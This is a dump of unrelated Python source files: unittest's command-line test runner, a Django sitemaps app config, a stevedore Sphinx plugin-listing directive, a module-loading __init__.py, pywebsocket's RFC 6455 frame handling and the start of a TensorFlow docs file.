Usage: %(progName)s [options] [tests]
Options:
-h, --help Show this message
-v, --verbose Verbose output
-q, --quiet Minimal output
%(failfast)s%(catchbreak)s%(buffer)s
Examples:
%(progName)s test_module - run tests from test_module
%(progName)s module.TestClass - run tests from module.TestClass
%(progName)s module.Class.test_method - run specified test method
[tests] can be a list of any number of test modules, classes and test
methods.
Alternative Usage: %(progName)s discover [options]
Options:
-v, --verbose Verbose output
%(failfast)s%(catchbreak)s%(buffer)s -s directory Directory to start discovery ('.' default)
-p pattern Pattern to match test files ('test*.py' default)
-t directory Top level directory of project (default to
start directory)
For test discovery all test modules must be importable from the top
level directory of the project.
"""
USAGE_FROM_MODULE = """\
Usage: %(progName)s [options] [test] [...]
Options:
-h, --help Show this message
-v, --verbose Verbose output
-q, --quiet Minimal output
%(failfast)s%(catchbreak)s%(buffer)s
Examples:
%(progName)s - run default set of tests
%(progName)s MyTestSuite - run suite 'MyTestSuite'
%(progName)s MyTestCase.testSomething - run MyTestCase.testSomething
%(progName)s MyTestCase - run all 'test*' test methods
in MyTestCase
"""
class TestProgram(object):
"""A command-line program that runs a set of tests; this is primarily
for making test modules conveniently executable.
"""
USAGE = USAGE_FROM_MODULE
# defaults for testing
failfast = catchbreak = buffer = progName = None
def __init__(self, module='__main__', defaultTest=None, argv=None,
testRunner=None, testLoader=loader.defaultTestLoader,
exit=True, verbosity=1, failfast=None, catchbreak=None,
buffer=None):
if isinstance(module, basestring):
self.module = __import__(module)
for part in module.split('.')[1:]:
self.module = getattr(self.module, part)
else:
self.module = module
if argv is None:
argv = sys.argv
self.exit = exit
self.failfast = failfast
self.catchbreak = catchbreak
self.verbosity = verbosity
self.buffer = buffer
self.defaultTest = defaultTest
self.testRunner = testRunner
self.testLoader = testLoader
self.progName = os.path.basename(argv[0])
self.parseArgs(argv)
self.runTests()
def usageExit(self, msg=None):
if msg:
print msg
usage = {'progName': self.progName, 'catchbreak': '', 'failfast': '',
'buffer': ''}
if self.failfast != False:
usage['failfast'] = FAILFAST
if self.catchbreak != False:
usage['catchbreak'] = CATCHBREAK
if self.buffer != False:
usage['buffer'] = BUFFEROUTPUT
print self.USAGE % usage
sys.exit(2)
def parseArgs(self, argv):
if len(argv) > 1 and argv[1].lower() == 'discover':
self._do_discovery(argv[2:])
return
import getopt
long_opts = ['help', 'verbose', 'quiet', 'failfast', 'catch', 'buffer']
try:
options, args = getopt.getopt(argv[1:], 'hHvqfcb', long_opts)
for opt, value in options:
if opt in ('-h','-H','--help'):
self.usageExit()
if opt in ('-q','--quiet'):
self.verbosity = 0
if opt in ('-v','--verbose'):
self.verbosity = 2
if opt in ('-f','--failfast'):
if self.failfast is None:
self.failfast = True
# Should this raise an exception if -f is not valid?
if opt in ('-c','--catch'):
if self.catchbreak is None:
self.catchbreak = True
# Should this raise an exception if -c is not valid?
if opt in ('-b','--buffer'):
if self.buffer is None:
self.buffer = True
# Should this raise an exception if -b is not valid?
if len(args) == 0 and self.defaultTest is None:
# createTests will load tests from self.module
self.testNames = None
elif len(args) > 0:
self.testNames = args
if __name__ == '__main__':
# to support python -m unittest ...
self.module = None
else:
self.testNames = (self.defaultTest,)
self.createTests()
except getopt.error, msg:
self.usageExit(msg)
def createTests(self):
if self.testNames is None:
self.test = self.testLoader.loadTestsFromModule(self.module)
else:
self.test = self.testLoader.loadTestsFromNames(self.testNames,
self.module)
def _do_discovery(self, argv, Loader=loader.TestLoader):
# handle command line args for test discovery
self.progName = '%s discover' % self.progName
import optparse
parser = optparse.OptionParser()
parser.prog = self.progName
parser.add_option('-v', '--verbose', dest='verbose', default=False,
help='Verbose output', action='store_true')
if self.failfast != False:
parser.add_option('-f', '--failfast', dest='failfast', default=False,
help='Stop on first fail or error',
action='store_true')
if self.catchbreak != False:
parser.add_option('-c', '--catch', dest='catchbreak', default=False,
help='Catch ctrl-C and display results so far',
action='store_true')
if self.buffer != False:
parser.add_option('-b', '--buffer', dest='buffer', default=False,
help='Buffer stdout and stderr during tests',
action='store_true')
parser.add_option('-s', '--start-directory', dest='start', default='.',
help="Directory to start discovery ('.' default)")
parser.add_option('-p', '--pattern', dest='pattern', default='test*.py',
help="Pattern to match tests ('test*.py' default)")
parser.add_option('-t', '--top-level-directory', dest='top', default=None,
help='Top level directory of project (defaults to start directory)')
options, args = parser.parse_args(argv)
if len(args) > 3:
self.usageExit()
for name, value in zip(('start', 'pattern', 'top'), args):
setattr(options, name, value)
# only set options from the parsing here
# if they weren't set explicitly in the constructor
if self.failfast is None:
self.failfast = options.failfast
if self.catchbreak is None:
self.catchbreak = options.catchbreak
if self.buffer is None:
self.buffer = options.buffer
if options.verbose:
self.verbosity = 2
start_dir = options.start
pattern = options.pattern
top_level_dir = options.top
loader = Loader()
self.test = loader.discover(start_dir, pattern, top_level_dir)
def runTests(self):
if self.catchbreak:
installHandler()
if self.testRunner is None:
self.testRunner = runner.TextTestRunner
if isinstance(self.testRunner, (type, types.ClassType)):
try:
testRunner = self.testRunner(verbosity=self.verbosity,
failfast=self.failfast,
buffer=self.buffer)
except TypeError:
# didn't accept the verbosity, buffer or failfast arguments
testRunner = self.testRunner()
else:
# it is assumed to be a TestRunner instance
testRunner = self.testRunner
self.result = testRunner.run(self.test)
if self.exit:
sys.exit(not self.result.wasSuccessful())
main = TestProgram
|
kenshay/ImageScript | refs/heads/master | ProgramData/SystemFiles/Python/Lib/site-packages/django/contrib/sitemaps/apps.py | 590 | from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
class SiteMapsConfig(AppConfig):
name = 'django.contrib.sitemaps'
verbose_name = _("Site Maps")
|
Elettronik/SickRage | refs/heads/master | lib/stevedore/sphinxext.py | 34 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import unicode_literals
import inspect
from docutils import nodes
from docutils.parsers import rst
from docutils.parsers.rst import directives
from docutils.statemachine import ViewList
from sphinx.util.nodes import nested_parse_with_titles
from stevedore import extension
def _get_docstring(plugin):
return inspect.getdoc(plugin) or ''
def _simple_list(mgr):
for name in sorted(mgr.names()):
ext = mgr[name]
doc = _get_docstring(ext.plugin) or '\n'
summary = doc.splitlines()[0].strip()
yield('* %s -- %s' % (ext.name, summary),
ext.entry_point.module_name)
def _detailed_list(mgr, over='', under='-', titlecase=False):
for name in sorted(mgr.names()):
ext = mgr[name]
if over:
yield (over * len(ext.name), ext.entry_point.module_name)
if titlecase:
yield (ext.name.title(), ext.entry_point.module_name)
else:
yield (ext.name, ext.entry_point.module_name)
if under:
yield (under * len(ext.name), ext.entry_point.module_name)
yield ('\n', ext.entry_point.module_name)
doc = _get_docstring(ext.plugin)
if doc:
yield (doc, ext.entry_point.module_name)
else:
yield ('.. warning:: No documentation found in %s'
% ext.entry_point,
ext.entry_point.module_name)
yield ('\n', ext.entry_point.module_name)
class ListPluginsDirective(rst.Directive):
"""Present a simple list of the plugins in a namespace."""
option_spec = {
'class': directives.class_option,
'detailed': directives.flag,
'titlecase': directives.flag,
'overline-style': directives.single_char_or_unicode,
'underline-style': directives.single_char_or_unicode,
}
has_content = True
def run(self):
env = self.state.document.settings.env
app = env.app
namespace = ' '.join(self.content).strip()
app.info('documenting plugins from %r' % namespace)
overline_style = self.options.get('overline-style', '')
underline_style = self.options.get('underline-style', '=')
def report_load_failure(mgr, ep, err):
app.warn(u'Failed to load %s: %s' % (ep.module_name, err))
mgr = extension.ExtensionManager(
namespace,
on_load_failure_callback=report_load_failure,
)
result = ViewList()
titlecase = 'titlecase' in self.options
if 'detailed' in self.options:
data = _detailed_list(
mgr, over=overline_style, under=underline_style,
titlecase=titlecase)
else:
data = _simple_list(mgr)
for text, source in data:
for line in text.splitlines():
result.append(line, source)
# Parse what we have into a new section.
node = nodes.section()
node.document = self.state.document
nested_parse_with_titles(self.state, result, node)
return node.children
def setup(app):
app.info('loading stevedore.sphinxext')
app.add_directive('list-plugins', ListPluginsDirective)
|
nieyb/yuanhe | refs/heads/master | deb_tmp/wifi-pumpkin_20171031_all/usr/share/WiFi-Pumpkin/plugins/external/scripts/__init__.py | 8 | #from http://stackoverflow.com/questions/1057431/loading-all-modules-in-a-folder-in-python
import os
import glob
__all__ = [ os.path.basename(f)[:-3] for f in glob.glob(os.path.dirname(__file__)+"/*.py")] |
shssoichiro/servo | refs/heads/master | tests/wpt/web-platform-tests/tools/pywebsocket/src/mod_pywebsocket/_stream_hybi.py | 628 | # Copyright 2012, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This file provides classes and helper functions for parsing/building frames
of the WebSocket protocol (RFC 6455).
Specification:
http://tools.ietf.org/html/rfc6455
"""
from collections import deque
import logging
import os
import struct
import time
from mod_pywebsocket import common
from mod_pywebsocket import util
from mod_pywebsocket._stream_base import BadOperationException
from mod_pywebsocket._stream_base import ConnectionTerminatedException
from mod_pywebsocket._stream_base import InvalidFrameException
from mod_pywebsocket._stream_base import InvalidUTF8Exception
from mod_pywebsocket._stream_base import StreamBase
from mod_pywebsocket._stream_base import UnsupportedFrameException
_NOOP_MASKER = util.NoopMasker()
class Frame(object):
def __init__(self, fin=1, rsv1=0, rsv2=0, rsv3=0,
opcode=None, payload=''):
self.fin = fin
self.rsv1 = rsv1
self.rsv2 = rsv2
self.rsv3 = rsv3
self.opcode = opcode
self.payload = payload
# Helper functions made public to be used for writing unittests for WebSocket
# clients.
def create_length_header(length, mask):
"""Creates a length header.
Args:
length: Frame length. Must be less than 2^63.
mask: Mask bit. Must be boolean.
Raises:
ValueError: when bad data is given.
"""
if mask:
mask_bit = 1 << 7
else:
mask_bit = 0
if length < 0:
raise ValueError('length must be non negative integer')
elif length <= 125:
return chr(mask_bit | length)
elif length < (1 << 16):
return chr(mask_bit | 126) + struct.pack('!H', length)
elif length < (1 << 63):
return chr(mask_bit | 127) + struct.pack('!Q', length)
else:
raise ValueError('Payload is too big for one frame')
def create_header(opcode, payload_length, fin, rsv1, rsv2, rsv3, mask):
"""Creates a frame header.
Raises:
Exception: when bad data is given.
"""
if opcode < 0 or 0xf < opcode:
raise ValueError('Opcode out of range')
if payload_length < 0 or (1 << 63) <= payload_length:
raise ValueError('payload_length out of range')
if (fin | rsv1 | rsv2 | rsv3) & ~1:
raise ValueError('FIN bit and Reserved bit parameter must be 0 or 1')
header = ''
first_byte = ((fin << 7)
| (rsv1 << 6) | (rsv2 << 5) | (rsv3 << 4)
| opcode)
header += chr(first_byte)
header += create_length_header(payload_length, mask)
return header
def _build_frame(header, body, mask):
if not mask:
return header + body
masking_nonce = os.urandom(4)
masker = util.RepeatedXorMasker(masking_nonce)
return header + masking_nonce + masker.mask(body)
def _filter_and_format_frame_object(frame, mask, frame_filters):
for frame_filter in frame_filters:
frame_filter.filter(frame)
header = create_header(
frame.opcode, len(frame.payload), frame.fin,
frame.rsv1, frame.rsv2, frame.rsv3, mask)
return _build_frame(header, frame.payload, mask)
def create_binary_frame(
message, opcode=common.OPCODE_BINARY, fin=1, mask=False, frame_filters=[]):
"""Creates a simple binary frame with no extension, reserved bit."""
frame = Frame(fin=fin, opcode=opcode, payload=message)
return _filter_and_format_frame_object(frame, mask, frame_filters)
def create_text_frame(
message, opcode=common.OPCODE_TEXT, fin=1, mask=False, frame_filters=[]):
"""Creates a simple text frame with no extension, reserved bit."""
encoded_message = message.encode('utf-8')
return create_binary_frame(encoded_message, opcode, fin, mask,
frame_filters)
def parse_frame(receive_bytes, logger=None,
ws_version=common.VERSION_HYBI_LATEST,
unmask_receive=True):
"""Parses a frame. Returns a tuple containing each header field and
payload.
Args:
receive_bytes: a function that reads frame data from a stream or
something similar. The function takes length of the bytes to be
read. The function must raise ConnectionTerminatedException if
there is not enough data to be read.
logger: a logging object.
ws_version: the version of WebSocket protocol.
unmask_receive: unmask received frames. When received unmasked
frame, raises InvalidFrameException.
Raises:
ConnectionTerminatedException: when receive_bytes raises it.
InvalidFrameException: when the frame contains invalid data.
"""
if not logger:
logger = logging.getLogger()
logger.log(common.LOGLEVEL_FINE, 'Receive the first 2 octets of a frame')
received = receive_bytes(2)
first_byte = ord(received[0])
fin = (first_byte >> 7) & 1
rsv1 = (first_byte >> 6) & 1
rsv2 = (first_byte >> 5) & 1
rsv3 = (first_byte >> 4) & 1
opcode = first_byte & 0xf
second_byte = ord(received[1])
mask = (second_byte >> 7) & 1
payload_length = second_byte & 0x7f
logger.log(common.LOGLEVEL_FINE,
'FIN=%s, RSV1=%s, RSV2=%s, RSV3=%s, opcode=%s, '
'Mask=%s, Payload_length=%s',
fin, rsv1, rsv2, rsv3, opcode, mask, payload_length)
if (mask == 1) != unmask_receive:
raise InvalidFrameException(
'Mask bit on the received frame did\'nt match masking '
'configuration for received frames')
# The HyBi and later specs disallow putting a value in 0x0-0xFFFF
# into the 8-octet extended payload length field (or 0x0-0xFD in
# 2-octet field).
valid_length_encoding = True
length_encoding_bytes = 1
if payload_length == 127:
logger.log(common.LOGLEVEL_FINE,
'Receive 8-octet extended payload length')
extended_payload_length = receive_bytes(8)
payload_length = struct.unpack(
'!Q', extended_payload_length)[0]
if payload_length > 0x7FFFFFFFFFFFFFFF:
raise InvalidFrameException(
'Extended payload length >= 2^63')
if ws_version >= 13 and payload_length < 0x10000:
valid_length_encoding = False
length_encoding_bytes = 8
logger.log(common.LOGLEVEL_FINE,
'Decoded_payload_length=%s', payload_length)
elif payload_length == 126:
logger.log(common.LOGLEVEL_FINE,
'Receive 2-octet extended payload length')
extended_payload_length = receive_bytes(2)
payload_length = struct.unpack(
'!H', extended_payload_length)[0]
if ws_version >= 13 and payload_length < 126:
valid_length_encoding = False
length_encoding_bytes = 2
logger.log(common.LOGLEVEL_FINE,
'Decoded_payload_length=%s', payload_length)
if not valid_length_encoding:
logger.warning(
'Payload length is not encoded using the minimal number of '
'bytes (%d is encoded using %d bytes)',
payload_length,
length_encoding_bytes)
if mask == 1:
logger.log(common.LOGLEVEL_FINE, 'Receive mask')
masking_nonce = receive_bytes(4)
masker = util.RepeatedXorMasker(masking_nonce)
logger.log(common.LOGLEVEL_FINE, 'Mask=%r', masking_nonce)
else:
masker = _NOOP_MASKER
logger.log(common.LOGLEVEL_FINE, 'Receive payload data')
if logger.isEnabledFor(common.LOGLEVEL_FINE):
receive_start = time.time()
raw_payload_bytes = receive_bytes(payload_length)
if logger.isEnabledFor(common.LOGLEVEL_FINE):
logger.log(
common.LOGLEVEL_FINE,
'Done receiving payload data at %s MB/s',
payload_length / (time.time() - receive_start) / 1000 / 1000)
logger.log(common.LOGLEVEL_FINE, 'Unmask payload data')
if logger.isEnabledFor(common.LOGLEVEL_FINE):
unmask_start = time.time()
unmasked_bytes = masker.mask(raw_payload_bytes)
if logger.isEnabledFor(common.LOGLEVEL_FINE):
logger.log(
common.LOGLEVEL_FINE,
'Done unmasking payload data at %s MB/s',
payload_length / (time.time() - unmask_start) / 1000 / 1000)
return opcode, unmasked_bytes, fin, rsv1, rsv2, rsv3
class FragmentedFrameBuilder(object):
"""A stateful class to send a message as fragments."""
def __init__(self, mask, frame_filters=[], encode_utf8=True):
"""Constructs an instance."""
self._mask = mask
self._frame_filters = frame_filters
# This is for skipping UTF-8 encoding when building text type frames
# from compressed data.
self._encode_utf8 = encode_utf8
self._started = False
# Hold opcode of the first frame in messages to verify types of other
# frames in the message are all the same.
self._opcode = common.OPCODE_TEXT
def build(self, payload_data, end, binary):
if binary:
frame_type = common.OPCODE_BINARY
else:
frame_type = common.OPCODE_TEXT
if self._started:
if self._opcode != frame_type:
raise ValueError('Message types are different in frames for '
'the same message')
opcode = common.OPCODE_CONTINUATION
else:
opcode = frame_type
self._opcode = frame_type
if end:
self._started = False
fin = 1
else:
self._started = True
fin = 0
if binary or not self._encode_utf8:
return create_binary_frame(
payload_data, opcode, fin, self._mask, self._frame_filters)
else:
return create_text_frame(
payload_data, opcode, fin, self._mask, self._frame_filters)
def _create_control_frame(opcode, body, mask, frame_filters):
frame = Frame(opcode=opcode, payload=body)
for frame_filter in frame_filters:
frame_filter.filter(frame)
if len(frame.payload) > 125:
raise BadOperationException(
'Payload data size of control frames must be 125 bytes or less')
header = create_header(
frame.opcode, len(frame.payload), frame.fin,
frame.rsv1, frame.rsv2, frame.rsv3, mask)
return _build_frame(header, frame.payload, mask)
def create_ping_frame(body, mask=False, frame_filters=[]):
return _create_control_frame(common.OPCODE_PING, body, mask, frame_filters)
def create_pong_frame(body, mask=False, frame_filters=[]):
return _create_control_frame(common.OPCODE_PONG, body, mask, frame_filters)
def create_close_frame(body, mask=False, frame_filters=[]):
return _create_control_frame(
common.OPCODE_CLOSE, body, mask, frame_filters)
def create_closing_handshake_body(code, reason):
body = ''
if code is not None:
if (code > common.STATUS_USER_PRIVATE_MAX or
code < common.STATUS_NORMAL_CLOSURE):
raise BadOperationException('Status code is out of range')
if (code == common.STATUS_NO_STATUS_RECEIVED or
code == common.STATUS_ABNORMAL_CLOSURE or
code == common.STATUS_TLS_HANDSHAKE):
raise BadOperationException('Status code is reserved pseudo '
'code')
encoded_reason = reason.encode('utf-8')
body = struct.pack('!H', code) + encoded_reason
return body
class StreamOptions(object):
"""Holds option values to configure Stream objects."""
def __init__(self):
"""Constructs StreamOptions."""
# Filters applied to frames.
self.outgoing_frame_filters = []
self.incoming_frame_filters = []
# Filters applied to messages. Control frames are not affected by them.
self.outgoing_message_filters = []
self.incoming_message_filters = []
self.encode_text_message_to_utf8 = True
self.mask_send = False
self.unmask_receive = True
class Stream(StreamBase):
"""A class for parsing/building frames of the WebSocket protocol
(RFC 6455).
"""
def __init__(self, request, options):
"""Constructs an instance.
Args:
request: mod_python request.
"""
StreamBase.__init__(self, request)
self._logger = util.get_class_logger(self)
self._options = options
self._request.client_terminated = False
self._request.server_terminated = False
# Holds body of received fragments.
self._received_fragments = []
# Holds the opcode of the first fragment.
self._original_opcode = None
self._writer = FragmentedFrameBuilder(
self._options.mask_send, self._options.outgoing_frame_filters,
self._options.encode_text_message_to_utf8)
self._ping_queue = deque()
def _receive_frame(self):
"""Receives a frame and return data in the frame as a tuple containing
each header field and payload separately.
Raises:
ConnectionTerminatedException: when read returns empty
string.
InvalidFrameException: when the frame contains invalid data.
"""
def _receive_bytes(length):
return self.receive_bytes(length)
return parse_frame(receive_bytes=_receive_bytes,
logger=self._logger,
ws_version=self._request.ws_version,
unmask_receive=self._options.unmask_receive)
def _receive_frame_as_frame_object(self):
opcode, unmasked_bytes, fin, rsv1, rsv2, rsv3 = self._receive_frame()
return Frame(fin=fin, rsv1=rsv1, rsv2=rsv2, rsv3=rsv3,
opcode=opcode, payload=unmasked_bytes)
def receive_filtered_frame(self):
"""Receives a frame and applies frame filters and message filters.
The frame to be received must satisfy following conditions:
- The frame is not fragmented.
- The opcode of the frame is TEXT or BINARY.
DO NOT USE this method except for testing purpose.
"""
frame = self._receive_frame_as_frame_object()
if not frame.fin:
raise InvalidFrameException(
'Segmented frames must not be received via '
'receive_filtered_frame()')
if (frame.opcode != common.OPCODE_TEXT and
frame.opcode != common.OPCODE_BINARY):
raise InvalidFrameException(
'Control frames must not be received via '
'receive_filtered_frame()')
for frame_filter in self._options.incoming_frame_filters:
frame_filter.filter(frame)
for message_filter in self._options.incoming_message_filters:
frame.payload = message_filter.filter(frame.payload)
return frame
def send_message(self, message, end=True, binary=False):
"""Send message.
Args:
message: text in unicode or binary in str to send.
binary: send message as binary frame.
Raises:
BadOperationException: when called on a server-terminated
connection or called with inconsistent message type or
binary parameter.
"""
if self._request.server_terminated:
raise BadOperationException(
'Requested send_message after sending out a closing handshake')
if binary and isinstance(message, unicode):
raise BadOperationException(
'Message for binary frame must be instance of str')
for message_filter in self._options.outgoing_message_filters:
message = message_filter.filter(message, end, binary)
try:
# Set this to any positive integer to limit maximum size of data in
# payload data of each frame.
MAX_PAYLOAD_DATA_SIZE = -1
if MAX_PAYLOAD_DATA_SIZE <= 0:
self._write(self._writer.build(message, end, binary))
return
bytes_written = 0
while True:
end_for_this_frame = end
bytes_to_write = len(message) - bytes_written
if (MAX_PAYLOAD_DATA_SIZE > 0 and
bytes_to_write > MAX_PAYLOAD_DATA_SIZE):
end_for_this_frame = False
bytes_to_write = MAX_PAYLOAD_DATA_SIZE
frame = self._writer.build(
message[bytes_written:bytes_written + bytes_to_write],
end_for_this_frame,
binary)
self._write(frame)
bytes_written += bytes_to_write
# This if must be placed here (the end of while block) so that
# at least one frame is sent.
if len(message) <= bytes_written:
break
except ValueError, e:
raise BadOperationException(e)
def _get_message_from_frame(self, frame):
"""Gets a message from frame. If the message is composed of fragmented
frames and the frame is not the last fragmented frame, this method
returns None. The whole message will be returned when the last
fragmented frame is passed to this method.
Raises:
InvalidFrameException: when the frame doesn't match defragmentation
context, or the frame contains invalid data.
"""
if frame.opcode == common.OPCODE_CONTINUATION:
if not self._received_fragments:
if frame.fin:
raise InvalidFrameException(
'Received a termination frame but fragmentation '
'not started')
else:
raise InvalidFrameException(
'Received an intermediate frame but '
'fragmentation not started')
if frame.fin:
# End of fragmentation frame
self._received_fragments.append(frame.payload)
message = ''.join(self._received_fragments)
self._received_fragments = []
return message
else:
# Intermediate frame
self._received_fragments.append(frame.payload)
return None
else:
if self._received_fragments:
if frame.fin:
raise InvalidFrameException(
'Received an unfragmented frame without '
'terminating existing fragmentation')
else:
raise InvalidFrameException(
'New fragmentation started without terminating '
'existing fragmentation')
if frame.fin:
# Unfragmented frame
self._original_opcode = frame.opcode
return frame.payload
else:
# Start of fragmentation frame
if common.is_control_opcode(frame.opcode):
raise InvalidFrameException(
'Control frames must not be fragmented')
self._original_opcode = frame.opcode
self._received_fragments.append(frame.payload)
return None
def _process_close_message(self, message):
"""Processes close message.
Args:
message: close message.
Raises:
InvalidFrameException: when the message is invalid.
"""
self._request.client_terminated = True
# Status code is optional. We can have status reason only if we
# have status code. Status reason can be empty string. So,
# allowed cases are
# - no application data: no code no reason
# - 2 octet of application data: has code but no reason
# - 3 or more octet of application data: both code and reason
if len(message) == 0:
self._logger.debug('Received close frame (empty body)')
self._request.ws_close_code = (
common.STATUS_NO_STATUS_RECEIVED)
elif len(message) == 1:
raise InvalidFrameException(
'If a close frame has status code, the length of '
'status code must be 2 octet')
elif len(message) >= 2:
self._request.ws_close_code = struct.unpack(
'!H', message[0:2])[0]
self._request.ws_close_reason = message[2:].decode(
'utf-8', 'replace')
self._logger.debug(
'Received close frame (code=%d, reason=%r)',
self._request.ws_close_code,
self._request.ws_close_reason)
# As we've received a close frame, no more data is coming over the
# socket. We can now safely close the socket without worrying about
# RST sending.
if self._request.server_terminated:
self._logger.debug(
'Received ack for server-initiated closing handshake')
return
self._logger.debug(
'Received client-initiated closing handshake')
code = common.STATUS_NORMAL_CLOSURE
reason = ''
if hasattr(self._request, '_dispatcher'):
dispatcher = self._request._dispatcher
code, reason = dispatcher.passive_closing_handshake(
self._request)
if code is None and reason is not None and len(reason) > 0:
self._logger.warning(
'Handler specified reason despite code being None')
reason = ''
if reason is None:
reason = ''
self._send_closing_handshake(code, reason)
self._logger.debug(
'Acknowledged closing handshake initiated by the peer '
'(code=%r, reason=%r)', code, reason)
def _process_ping_message(self, message):
"""Processes ping message.
Args:
message: ping message.
"""
try:
handler = self._request.on_ping_handler
if handler:
handler(self._request, message)
return
except AttributeError, e:
pass
self._send_pong(message)
def _process_pong_message(self, message):
"""Processes pong message.
Args:
message: pong message.
"""
# TODO(tyoshino): Add ping timeout handling.
inflight_pings = deque()
while True:
try:
expected_body = self._ping_queue.popleft()
if expected_body == message:
# inflight_pings contains pings ignored by the
# other peer. Just forget them.
self._logger.debug(
'Ping %r is acked (%d pings were ignored)',
expected_body, len(inflight_pings))
break
else:
inflight_pings.append(expected_body)
except IndexError, e:
# The received pong was unsolicited pong. Keep the
# ping queue as is.
self._ping_queue = inflight_pings
self._logger.debug('Received a unsolicited pong')
break
try:
handler = self._request.on_pong_handler
if handler:
handler(self._request, message)
except AttributeError, e:
pass
def receive_message(self):
"""Receive a WebSocket frame and return its payload as a text in
unicode or a binary in str.
Returns:
payload data of the frame
- as unicode instance if received text frame
- as str instance if received binary frame
or None iff received closing handshake.
Raises:
BadOperationException: when called on a client-terminated
connection.
ConnectionTerminatedException: when read returns empty
string.
InvalidFrameException: when the frame contains invalid
data.
UnsupportedFrameException: when the received frame has
flags, opcode we cannot handle. You can ignore this
exception and continue receiving the next frame.
"""
if self._request.client_terminated:
raise BadOperationException(
'Requested receive_message after receiving a closing '
'handshake')
while True:
# mp_conn.read will block if no bytes are available.
# Timeout is controlled by TimeOut directive of Apache.
frame = self._receive_frame_as_frame_object()
# Check the constraint on the payload size for control frames
# before extension processes the frame.
# See also http://tools.ietf.org/html/rfc6455#section-5.5
if (common.is_control_opcode(frame.opcode) and
len(frame.payload) > 125):
raise InvalidFrameException(
'Payload data size of control frames must be 125 bytes or '
'less')
for frame_filter in self._options.incoming_frame_filters:
frame_filter.filter(frame)
if frame.rsv1 or frame.rsv2 or frame.rsv3:
raise UnsupportedFrameException(
'Unsupported flag is set (rsv = %d%d%d)' %
(frame.rsv1, frame.rsv2, frame.rsv3))
message = self._get_message_from_frame(frame)
if message is None:
continue
for message_filter in self._options.incoming_message_filters:
message = message_filter.filter(message)
if self._original_opcode == common.OPCODE_TEXT:
# The WebSocket protocol section 4.4 specifies that invalid
# characters must be replaced with U+fffd REPLACEMENT
# CHARACTER.
try:
return message.decode('utf-8')
except UnicodeDecodeError, e:
raise InvalidUTF8Exception(e)
elif self._original_opcode == common.OPCODE_BINARY:
return message
elif self._original_opcode == common.OPCODE_CLOSE:
self._process_close_message(message)
return None
elif self._original_opcode == common.OPCODE_PING:
self._process_ping_message(message)
elif self._original_opcode == common.OPCODE_PONG:
self._process_pong_message(message)
else:
raise UnsupportedFrameException(
'Opcode %d is not supported' % self._original_opcode)
def _send_closing_handshake(self, code, reason):
body = create_closing_handshake_body(code, reason)
frame = create_close_frame(
body, mask=self._options.mask_send,
frame_filters=self._options.outgoing_frame_filters)
self._request.server_terminated = True
self._write(frame)
def close_connection(self, code=common.STATUS_NORMAL_CLOSURE, reason='',
wait_response=True):
"""Closes a WebSocket connection.
Args:
code: Status code for close frame. If code is None, a close
frame with empty body will be sent.
reason: string representing close reason.
wait_response: True when caller want to wait the response.
Raises:
BadOperationException: when reason is specified with code None
or reason is not an instance of both str and unicode.
"""
if self._request.server_terminated:
self._logger.debug(
'Requested close_connection but server is already terminated')
return
if code is None:
if reason is not None and len(reason) > 0:
raise BadOperationException(
'close reason must not be specified if code is None')
reason = ''
else:
if not isinstance(reason, str) and not isinstance(reason, unicode):
raise BadOperationException(
'close reason must be an instance of str or unicode')
self._send_closing_handshake(code, reason)
self._logger.debug(
'Initiated closing handshake (code=%r, reason=%r)',
code, reason)
if (code == common.STATUS_GOING_AWAY or
code == common.STATUS_PROTOCOL_ERROR) or not wait_response:
# It doesn't make sense to wait for a close frame if the reason is
# protocol error or that the server is going away. For some of
# other reasons, it might not make sense to wait for a close frame,
# but it's not clear, yet.
return
# TODO(ukai): 2. wait until the /client terminated/ flag has been set,
# or until a server-defined timeout expires.
#
# For now, we expect receiving closing handshake right after sending
# out closing handshake.
message = self.receive_message()
if message is not None:
raise ConnectionTerminatedException(
'Didn\'t receive valid ack for closing handshake')
# TODO: 3. close the WebSocket connection.
# note: mod_python Connection (mp_conn) doesn't have close method.
def send_ping(self, body=''):
frame = create_ping_frame(
body,
self._options.mask_send,
self._options.outgoing_frame_filters)
self._write(frame)
self._ping_queue.append(body)
def _send_pong(self, body):
frame = create_pong_frame(
body,
self._options.mask_send,
self._options.outgoing_frame_filters)
self._write(frame)
def get_last_received_opcode(self):
"""Returns the opcode of the WebSocket message which the last received
frame belongs to. The return value is valid iff immediately after
receive_message call.
"""
return self._original_opcode
# vi:sts=4 sw=4 et
|
jbedorf/tensorflow | refs/heads/master | tensorflow/tools/docs/generate_lib.py | 18 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
